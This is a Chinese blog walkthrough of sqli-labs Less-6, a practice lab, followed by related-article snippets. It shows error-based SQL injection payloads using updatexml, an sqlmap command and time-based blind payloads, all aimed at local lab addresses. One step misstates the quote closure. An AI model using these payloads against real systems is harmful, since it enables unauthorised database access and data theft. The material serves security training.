​Sqli-labs靶场第6关详解[Sqli-labs-less-6]

最新推荐文章于 2024-04-09 14:22:03 发布
最新推荐文章于 2024-04-09 14:22:03 发布
阅读量1.2k 收藏 22
点赞数 22
分类专栏: sqli-labs 文章标签: 网络安全 数据库 web安全 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/136197182
版权

Sqli-labs-Less-6

前言:

SQL注入的三个条件:
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)

    利用 order by 来测列数

    测显位:mysql用1,2,3,4

 Mysql获取相关数据:

    一、数据库版本-看是否认符合information_schema查询-version()
    二、数据库用户-看是否符合root型注入攻击-user()
    三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
    四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()

 sql注入——报错注入(Error-based)

sqlmap 会替换或者添加用于引发特定数据库错误的 SQL 语句到查询参数里面,并通过解析对应的注入结果,判断特定的数据库错误信息是否存在响应的 headers/body 中。这项技术只有在 Web 应用配置开启后端 DBMS 错误信息提醒才有效。

MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。

updatexml(xml_target, xpath_expr, new_val)

  • xml_target 是要更新的 XML 列或变量。
  • xpath_expr 是要更新的 XML 节点的路径表达式。
  • new_val 是要替换节点值的新值。

 #手工注入

1.根据提示id传参/?id=1,显示You are in...........

/?id=0  显示空 , 即当id值不存在时,前端显示为空

/?id=1'  显示You are in...........  

/?id=1"  显示near '"1"" LIMIT 0,1' at line 1   即闭合为 单引号' 闭合

/?id=1" order by 4 --+    即当值为4时报错,所以列数为3

利用联合查询union 发现仍然显示You are in...........

根据前面的测试,发现联合查询用不了,猜测后台代码逻辑当id 正确执行时显示  You are in...........  ,id错误时为空,代码报错显示报错情况。

所以,这题可使用报错注入试试,updatexml()函数+concat():拼接特殊符号和查询结果

http://192.168.0.7:802/sqli-labs/Less-6/?id=0" and updatexml(1,concat(1,(select user())),1)--+

 爆当前用户为root@localhost

成功利用漏洞!!!

 #自动化注入-SQLmap工具注入

SQLmap用户手册:文档介绍 - sqlmap 用户手册

python sqlmap.py -u http://192.168.0.7:802/sqli-labs/Less-6/?id=1 --current-user

 爆当前用户为root@localhost

「已注销」
关注
  • 22
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs第六sql注入流程
qq_33598708的博客
03-30 395
正常访问 http://127.0.0.1/sqli-labs-master/Less-6/?id=2 %23 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-6/?id=2" 根据报错可以知道是字符注入,使用 " 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重点是盲注。 这和第五相似,只有闭合使用不同,请参考第五注入思路. ...
sqli-labs系列——第六(双引号二次查询注入)
1匹黑马
05-08 2170
文章目录判断注入开始注入 判断注入 先输一个单引号看看: 、 可以看到这里是采用的双引号闭合,那么我们就在后边让它跟一个双引号报错: 开始注入 第六其实就是一个双引号的二次查询注入,这里就不做过多演示了,原理跟第五一样,都是用了count()、floor()、rand()、group by语句来进行注入的。 这里直接上exp干了: http://192.168.1.113:86/Less-6/?id=1" union SELECT null,count(*),concat((select passw
sql注入之延时注入
最新发布
weixin_45653478的博客
04-09 1080
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
sqli-labs系列——第六
茶寂的博客
01-15 2234
less6 这个本质上跟第五相同都是使用报错注入,这一使用的是双引号闭合 还是使用updatexml()这个函数 ?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库名: ?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表名: ?id=1" union select updatexml(1,con
sqli-labs靶场第五
gou1791241251的博客
12-20 4258
第五与前面几都有所不同,话不多说,我们传入id=1进去看看吧! 此时页面回显信息为you are in… 第一步:判断注入类型,字符型还是数字型 从报错信息不难看出注入类型为字符型,且为单引号闭合 此步证实了单引号闭合 第二步:判断字段数(使用order by) order by 3时页面正常,order by 4时页面异常,说明有三个字段 页面有布尔类型状态,所以用布尔盲注,页面没有回显不能用联合查询,页面没有报错信息不能用报错注入。 使用length函数来判断数据库名长度是否为1,由图可
sql双引号二次注入-sqli-labs第6
weixin_46784800的博客
11-03 206
获取database http://sqli/Less-6/?id=1" union select null, count(*), concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- - 两次执行即可爆出database 获取表名 http://sqli/Less-6/?id=1" union select null, count(*), concat((select
sqli-labs-master第六
weixin_33889245的博客
01-19 382
文本文档可以下载: 链接:https://pan.baidu.com/s/1o9c0Hyq 密码:md9w 转载于:https://blog.51cto.com/tdcqvip/2062957
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
02-12
sqli-labs靶场
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
基于Sqli-Labs靶场SQL注入-第6~10
Joker
11-25 1894
本文讲解 updatexml() 函数报错注入、导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
sqli-labs第五、六(详细)
TA不懒,但还没有添加简介
09-09 702
sqli-labs第五(详细)
Sqli-labs——lesson6
weixin_62281892的博客
06-29 311
lesson6
sqli-labs 六至十
2202_75317918的博客
04-09 911
sqli-labs 六至十
sqli-labtips 第五~第六
weixin_44089266的博客
04-06 832
** 第五和第六为报错型sql注入,此处只对第五进行详解** 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅。 首先在未知闭合方式的条件下,构造payload进行测试 http://192.168.226.136/sqli-labs-master/Less-5/?id=1 观察到页面回显如下 重新构造payload h...
sqli-labs通攻略教程六(less26~less28a)
m0_55854679的博客
07-21 813
less 26 方法1 由题目可知,本题绕过了空格和注释,注释符用|| '1'='1或者;%00绕过。 空白符绕过 (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/ (2)正则空白符:%09、%0A、%0B、%0D、%20 25%为百分号,%25A0就是空白符 绕开空格 %09——TAB键(水平) %0a——新建一行 %0c——新的一页 %0d return 功能 %0b——TAB键(垂直) %a0——空格 由源码可知,题目还将and、or等下列
sqli-labs-master第五+第六
m_ing
05-10 781
话不多说开始吧! http://192.168.89.131/sqli-labs-master/Less-5/ 看到这个提示信息,一脸懵逼。我也查阅了一些资料可能是:布尔型盲注、报错型注入、时间延迟型盲注了。 到这里时我们需要了解一些sql语句、函数。可以参考这位兄弟的博客 其实有很多种方法我们慢慢道来 第一种方法:时间延迟型手工注入 时间延迟型手工注入,正确会延迟,错误没有延迟。id无所谓,又不看回显,可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。 我们构造sql语句,带上延
sqlmap跑sqli-labs靶场第一
01-06
以下是使用sqlmap跑sqli-labs靶场第一的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测目标网站是否存在SQL注入漏洞: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs ``` 这个命令将使用sqlmap工具对目标网站进行扫描,并尝试发现数据库。 4. 如果目标网站存在SQL注入漏洞,sqlmap将返回数据库的名称。你可以使用以下命令来获取数据库的名称: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs --batch --dump ``` 这个命令将获取数据库的名称,并尝试获取数据库中的表和数据。 请注意,上述命令中的URL和参数可能需要根据你的实际情况进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值